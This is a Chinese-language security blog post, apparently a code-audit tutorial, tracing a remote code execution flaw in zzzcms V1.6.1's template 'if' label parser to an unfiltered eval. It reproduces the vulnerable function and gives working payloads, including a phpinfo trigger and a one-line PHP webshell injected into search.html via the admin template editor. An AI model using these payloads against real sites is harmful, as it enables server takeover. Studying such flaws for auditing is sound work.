<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="文章首发公众号：[信安之路]zzzcms的后台模板处的命令执行可以说是这套CMS比较典型的漏洞了，很久之前自己跟踪过一遍漏洞代码，最近又拿起来玩了玩，发现自己也能够审计到这个漏洞点，整个漏洞审计的过程也很简单，没有啥骚操作。 下面我就会按照审计的思路，而并非漏洞分析的思路，给大家说说我是如何通过自己的努力审计出这个命令执行漏洞的">
<meta name="keywords" content="代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="再谈zzzcms高危漏洞，你也能审计出来的代码执行">
<meta property="og:url" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/index.html">
<meta property="og:site_name" content="Sriracha :)">
<meta property="og:description" content="文章首发公众号：[信安之路]zzzcms的后台模板处的命令执行可以说是这套CMS比较典型的漏洞了，很久之前自己跟踪过一遍漏洞代码，最近又拿起来玩了玩，发现自己也能够审计到这个漏洞点，整个漏洞审计的过程也很简单，没有啥骚操作。 下面我就会按照审计的思路，而并非漏洞分析的思路，给大家说说我是如何通过自己的努力审计出这个命令执行漏洞的">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval2.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval3.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/phpinfo.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/ParserTemplate.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/ParserTemplate2.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/diyichu.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/location.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/location2.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/sssss.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/模板.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/fuckuser.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/checklocation.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/LL.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/define.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/success1.png">
<meta property="og:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/success2.png">
<meta property="og:updated_time" content="2020-01-13T04:46:54.240Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="再谈zzzcms高危漏洞，你也能审计出来的代码执行">
<meta name="twitter:description" content="文章首发公众号：[信安之路]zzzcms的后台模板处的命令执行可以说是这套CMS比较典型的漏洞了，很久之前自己跟踪过一遍漏洞代码，最近又拿起来玩了玩，发现自己也能够审计到这个漏洞点，整个漏洞审计的过程也很简单，没有啥骚操作。 下面我就会按照审计的思路，而并非漏洞分析的思路，给大家说说我是如何通过自己的努力审计出这个命令执行漏洞的">
<meta name="twitter:image" content="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval.png">



  <link rel="alternate" href="/atom.xml" title="Sriracha :)" type="application/atom+xml">




  <link rel="canonical" href="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>再谈zzzcms高危漏洞，你也能审计出来的代码执行 | Sriracha :)</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sriracha :)</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">Wow, the smell is great!</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-pentest">

    
    
    
      
    

    

    <a href="/Pentest" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>渗透测试</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-audit">

    
    
    
      
    

    

    <a href="/Audit" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>代码审计</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-python">

    
    
    
      
    

    

    <a href="/Python" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Python</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about_me">

    
    
    
      
    

    

    <a href="/About_Me" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>关于我</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-weapon">

    
    
    
      
    

    

    <a href="/weapon" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Weapon</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://sherlocz.github.io/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sher10ck">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sriracha :)">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">再谈zzzcms高危漏洞，你也能审计出来的代码执行

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2020-01-08 15:03:46" itemprop="dateCreated datePublished" datetime="2020-01-08T15:03:46+08:00">2020-01-08</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2020-01-13 12:46:54" itemprop="dateModified" datetime="2020-01-13T12:46:54+08:00">2020-01-13</time>
              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>文章首发公众号：[信安之路]<br>zzzcms的后台模板处的命令执行可以说是这套CMS比较典型的漏洞了，很久之前自己跟踪过一遍漏洞代码，最近又拿起来玩了玩，发现自己也能够审计到这个漏洞点，整个漏洞审计的过程也很简单，没有啥骚操作。</p>
<p><strong>下面我就会按照审计的思路，而并非漏洞分析的思路，给大家说说我是如何通过自己的努力审计出这个命令执行漏洞的</strong><br><a id="more"></a></p>
<p>cms下载地址：<a href="https://yunpan.360.cn/surl_ycSTDKgjnKt" target="_blank" rel="noopener">https://yunpan.360.cn/surl_ycSTDKgjnKt</a><br>这里我下载的是V1.6.1</p>
<h1 id="定位漏洞点"><a href="#定位漏洞点" class="headerlink" title="定位漏洞点"></a>定位漏洞点</h1><p>审计的时候我是直接全局搜索敏感函数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php代码执行函数：</span><br><span class="line">eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function</span><br></pre></td></tr></table></figure></p>
<p>首先看下eval，全局搜索<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval.png" alt><br>仔细翻翻看，存在eval函数的php文件就只有这一个zzz_template.php，而我们的这个命令执行的漏洞点也就是存在这里。(惊不惊喜，发现漏洞点其实就是这么简单)</p>
<p>跟踪到了 <strong>/inc/zzz_template.php</strong> 中的 <strong>parserIfLabel</strong> 函数<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval2.png" alt><br>有嫌疑的点我们找到了，接下来我们仔细看看这个函数</p>
<h1 id="细看漏洞函数"><a href="#细看漏洞函数" class="headerlink" title="细看漏洞函数"></a>细看漏洞函数</h1><p>来看一下这个函数的逻辑<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/eval3.png" alt><br>无敌，看起来并没有啥过滤，我们本地将这个函数弄出来测试一下<br>这里将我们$zcontent的值构造一下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$zcontent = &apos;&#123;if:assert($_request[phpinfo()])&#125;phpinfo();&#123;end if&#125;&apos;;</span><br><span class="line">parserIfLabel( $zcontent );</span><br><span class="line"></span><br><span class="line">function parserIfLabel( $zcontent ) &#123;</span><br><span class="line">	$pattern = &apos;/\&#123;if:([\s\S]+?)&#125;([\s\S]*?)&#123;end\s+if&#125;/&apos;;</span><br><span class="line">	if ( preg_match_all( $pattern, $zcontent, $matches ) ) &#123;</span><br><span class="line">		$count = count( $matches[ 0 ] );</span><br><span class="line">		for ( $i = 0; $i &lt; $count; $i++ ) &#123;</span><br><span class="line">			$flag = &apos;&apos;;</span><br><span class="line">			$out_html = &apos;&apos;;</span><br><span class="line">			$ifstr = $matches[ 1 ][ $i ];</span><br><span class="line">			$ifstr = str_replace( &apos;&lt;&gt;&apos;, &apos;!=&apos;, $ifstr );</span><br><span class="line">			$ifstr = str_replace( &apos;mod&apos;, &apos;%&apos;, $ifstr );</span><br><span class="line">			$ifstr1 = cleft( $ifstr, 0, 1 );</span><br><span class="line">			switch ( $ifstr1 ) &#123;</span><br><span class="line">				case &apos;=&apos;:</span><br><span class="line">					$ifstr = &apos;0&apos; . $ifstr;</span><br><span class="line">					break;</span><br><span class="line">				case &apos;&#123;&apos;:</span><br><span class="line">				case &apos;[&apos;:</span><br><span class="line">					$ifstr = &quot;&apos;&quot; . str_replace( &quot;=&quot;, &quot;&apos;=&quot;, $ifstr );</span><br><span class="line">					break;</span><br><span class="line">			&#125;</span><br><span class="line">			$ifstr = str_replace( &apos;=&apos;, &apos;==&apos;, $ifstr );</span><br><span class="line">			$ifstr = str_replace( &apos;===&apos;, &apos;==&apos;, $ifstr );</span><br><span class="line">			@eval( &apos;if(&apos; . $ifstr . &apos;)&#123;$flag=&quot;if&quot;;&#125;else&#123;$flag=&quot;else&quot;;&#125;&apos; );</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function cleft( $str, $start = 0, $num = 1 ) &#123;</span><br><span class="line">	$var = trim( $str );</span><br><span class="line">	$result = substr( $var, $start, $num );</span><br><span class="line">	return $result;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>访问:<a href="http://127.0.0.1/test.php" target="_blank" rel="noopener">http://127.0.0.1/test.php</a><br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/phpinfo.png" alt><br>成功执行命令了，这个函数存在命令执行漏洞！</p>
<h1 id="如何调用漏洞函数"><a href="#如何调用漏洞函数" class="headerlink" title="如何调用漏洞函数"></a>如何调用漏洞函数</h1><p>这里又出现了一个问题，漏洞函数找到了，如何去调用这一个函数呢？</p>
<p>在审计的时候我一般会有两种思路：<br>1、特定的功能点调用漏洞函数，我们寻找功能点<br>2、可以直接url调用漏洞函数，构造url触发漏洞</p>
<p>大家可以自行尝试一下这两种思路。</p>
<p>那么这里是哪种呢，往下看，我们看看zzz_template.php的整体架构。</p>
<p><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/ParserTemplate.png" alt><br>原来我们这里的 <strong>parserIfLabel</strong> 函数是在 <strong>ParserTemplate</strong> 类中的，而且这个类中的 <strong>parserCommom</strong> 也会调用这个函数。</p>
<p>那么想触发我们的漏洞函数，首先必须要生成 <strong>ParserTemplate</strong> 这个类。</p>
<p>全局搜索<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/ParserTemplate2.png" alt></p>
<p>这里在两个文件中出现了 <strong>ParserTemplate</strong> 类，一个是/admin123/save.php，另外一个是zzz_client.php，不喜欢看后台我就直接看了下zzz_client.php。</p>
<p>zzz_client.php中匹配到了多次，我们一个一个来看</p>
<h1 id="第一个匹配点，利用失败"><a href="#第一个匹配点，利用失败" class="headerlink" title="第一个匹配点，利用失败"></a>第一个匹配点，利用失败</h1><p><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/diyichu.png" alt></p>
<p>注意上面的if条件：<strong>$location==’user’</strong></p>
<p>我们继续跟踪 <strong>$location</strong> 这个变量，来到了line23<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/location.png" alt></p>
<p>跟踪 <strong>getlocation()</strong> 这个函数<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/location2.png" alt></p>
<p>其实下面还有一大段代码没有截出来，但是没有关系，我们只需要用get请求location参数，举个例子：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">我们构造url:</span><br><span class="line">http://127.0.0.1/zzzphpV1.6.1/?location=user</span><br><span class="line">那么我们的参数:</span><br><span class="line">$location=user</span><br></pre></td></tr></table></figure></p>
<p>这样就能满足我们的条件了，继续看if里面的内容，我这里继续贴出关键的代码：<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/sssss.png" alt></p>
<p>这里的 <strong>TPL_DIR</strong> 的值为 <strong>\template\pc\cn2016\html\</strong>，怎么构造的可以自己跟踪一下</p>
<p>整个流程我简化出来了，要是我们可以将我们的$zcontent修改成我们构造好的内容，那岂不是就能够触发了。</p>
<p>所以这个点我们要修改 <strong>\template\pc\cn2016\html\userlogin.html</strong> 中的内容，这里后台给我们提供了这样的功能。<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/模板.png" alt></p>
<p>但是我们发现 <strong>html</strong> 文件夹下并不存在<strong>userlogin.html</strong>，尴尬了，又不能自己新建一个。</p>
<p>看来 location为user这条路走不通，继续看下一个。</p>
<h1 id="第N个匹配点，利用成功"><a href="#第N个匹配点，利用成功" class="headerlink" title="第N个匹配点，利用成功"></a>第N个匹配点，利用成功</h1><p>失败乃成功之母，在我跟踪了N次之后，终于找到了可以利用的一个点(大家可以自行尝试一下)</p>
<p>其实也就是第三个匹配的点，前两个用的有点鸡肋。<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/fuckuser.png" alt><br>当我们的 $location=search/form/screen/app的时候进入下一步。<br>html文件下并不存在 form/screen/app.html，这里只能利用search了呀。</p>
<p>于是乎我访问了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/zzzphpV1.6.1/?location=serach</span><br></pre></td></tr></table></figure></p>
<p>并没有跳转到search的页面，而是给我返回到了主页，按道理来说应该是能行的啊，后来发现问题在getlocation这个函数里面的checklocation函数<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/checklocation.png" alt></p>
<p>search并不在这几个列表里面，那要想办法继续搞啊，于是我继续细看了getlocation函数，发现一个有意思的地方<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/LL.png" alt></p>
<p>要是search自定义了LOCATION就好了，全局搜索这个LOCATION<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/define.png" alt></p>
<p>嘿嘿，正好search中定义了这个值，在 <strong>search\index.php</strong> 中，这不就刚好吗，我去修改了 html下的search.html<br><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/success1.png" alt></p>
<p>然后访问<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/zzzphpV1.6.1/search/index.php</span><br></pre></td></tr></table></figure></p>
<p><img src="/2020/01/08/再谈zzzcms代码执行，你也能审计出来的高危漏洞/success2.png" alt></p>
<p>成功执行phpinfo</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">phpinfo_payload:&#123;if:assert($_request[phpinfo()])&#125;phpinfo();&#123;end if&#125;</span><br><span class="line">一句话_payload:&#123;if:&lt;?php eval($_POST[sss]) ?&gt;&#125;phpinfo();&#123;end if&#125;</span><br></pre></td></tr></table></figure>
<p>还有没有其他可以利用的点就靠大家自行去挖掘了</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>自身的审计能力和漏洞复现跟踪代码完全是两码事，复现看懂了漏洞成因你不一定能够审计的出来，自身的审计能力也需要经过大量的思考才会有所提升，希望大家都能够静下心来看会代码，漏洞就在那里，看你是否主动去寻找到它了，希望这篇文章能对你有所帮助。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/12/30/利用cs-proxifier代理内网流量/" rel="next" title="利用cs+proxifier代理内网流量">
                <i class="fa fa-chevron-left"></i> 利用cs+proxifier代理内网流量
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/01/31/简单的域环境搭建/" rel="prev" title="简单的域环境搭建">
                简单的域环境搭建 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">sher10ck</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">85</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">27</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wulidecade.cn" title="https://wulidecade.cn" rel="noopener" target="_blank">Decade</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mang0.me/" title="http://mang0.me/" rel="noopener" target="_blank">Mang0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.singll.cc/" title="https://blog.singll.cc/" rel="noopener" target="_blank">Singll</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io/" title="https://timeshu.github.io/" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hit0on.github.io/" title="https://hit0on.github.io/" rel="noopener" target="_blank">HitOn</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#定位漏洞点"><span class="nav-number">1.</span> <span class="nav-text">定位漏洞点</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#细看漏洞函数"><span class="nav-number">2.</span> <span class="nav-text">细看漏洞函数</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#如何调用漏洞函数"><span class="nav-number">3.</span> <span class="nav-text">如何调用漏洞函数</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第一个匹配点，利用失败"><span class="nav-number">4.</span> <span class="nav-text">第一个匹配点，利用失败</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第N个匹配点，利用成功"><span class="nav-number">5.</span> <span class="nav-text">第N个匹配点，利用成功</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#总结"><span class="nav-number">6.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sher10ck</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v6.7.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  

  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  
  





  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
